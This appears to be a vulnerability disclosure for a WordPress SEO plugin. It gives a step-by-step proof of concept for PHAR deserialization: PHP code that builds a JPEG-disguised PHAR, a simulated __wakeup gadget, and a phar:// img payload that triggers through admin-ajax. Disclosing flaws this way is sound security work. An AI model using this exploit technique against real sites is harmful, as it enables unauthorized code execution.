The plugin does not validate image file paths before manipulating the image files, so an attacker-controlled `phar://` path reaches a filesystem function and triggers PHAR deserialization. Furthermore, the plugin contains a gadget chain which may be used in certain configurations to achieve remote code execution.
1. Use a WordPress instance running PHP 7.x (PHP 8 no longer unserializes PHAR metadata automatically when a `phar://` path is opened, so the trigger below does not fire there).
2. Create a PHP file `create_phar.php` with the following code:
<?php
// Placeholder for the gadget class; only its name matters in the serialized metadata.
class Evil {}
// create new Phar
$phar = new Phar('poc.phar');
$phar->startBuffering();
$phar->addFromString('test.png', 'text');
// JPEG magic bytes (FF D8 FF) in front of the stub so the upload passes WordPress's image-type check
$phar->setStub("\xff\xd8\xff\n<?php __HALT_COMPILER(); ?>");
// Serialized Evil object; PHP 7 unserializes it whenever the archive is opened via phar://
$phar->setMetadata(new Evil());
$phar->stopBuffering();
3. Create the PHAR file `poc.phar` by running `php --define phar.readonly=0 create_phar.php` (`phar.readonly` defaults to 1, which blocks writing archives).
4. Rename `poc.phar` to `poc.jpg`
5. Upload `poc.jpg` through the WordPress Media Library (Media > Add New). Take note of its path within `wp-content/uploads`.
6. Add the following code to the site (for example in the active theme's `functions.php` or a must-use plugin) in order to simulate a gadget:
class Evil {
    // Runs automatically when the serialized Evil object in the PHAR metadata is unserialized
    public function __wakeup() : void {
        die("Arbitrary deserialization");
    }
}
7. Create or edit a post or page in the block editor. Add an `HTML` block with the following contents, adjusting the year/month part of the path to wherever `poc.jpg` was stored on your test server (`../` is relative to `wp-admin`, where `admin-ajax.php` runs; `test.png` is the entry added to the archive above).
<img src="phar://../wp-content/uploads/2023/03/poc.jpg/test.png">
8. Without saving the post or page, open the browser's developer tools on the Network tab, then click “Reload Analysis” in the “SEO Page Optimization” section. Notice that the `admin-ajax.php` request with `action=wpms` and `task=reload_analysis` returns the text “Arbitrary deserialization”, demonstrating the vulnerability.